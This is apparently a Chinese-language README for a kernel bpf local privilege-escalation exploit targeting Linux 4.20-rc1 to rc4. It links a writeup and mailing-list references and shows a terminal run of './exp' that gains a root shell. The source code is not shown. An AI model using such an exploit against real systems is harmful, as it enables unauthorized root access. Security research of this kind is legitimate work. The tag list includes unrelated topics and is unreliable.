ww9210/kernel4.20_bpf_LPE

关于此漏洞的 writeup 可参见 https://www.anquanke.com/post/id/166819（中文）。 这是一个针对内核 bpf 漏洞的本地权限提升 exploit。 受影响版本：4.20-rc1, 4.20-rc2, 4.20-rc3, 4.20-rc4 ``` user@syzkaller:~$ ./exp rop_payload_initialized uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:kernel_t:s0 # uname -a Linux syzkaller 4.20.0-rc3 #1 SMP Thu Nov 22 15:12:38 CST 2018 x86_64 GNU/Linux # ``` 参考资料： https://www.mail-archive.com/netdev@vger.kernel.org/msg256073.html https://www.mail-archive.com/netdev@vger.kernel.org/msg256054.html

标签：4.20-rc, CVE, Docker镜像, Exploit, Linux内核, ROP, Syzkaller, Web报告查看器, x86_64, 二进制安全, 代码执行, 内核提权, 协议分析, 堆溢出, 子域名枚举, 安全渗透, 安全漏洞, 客户端加密, 客户端加密, 数字签名, 本地提权, 权限提升, 系统安全, 网络安全, 隐私保护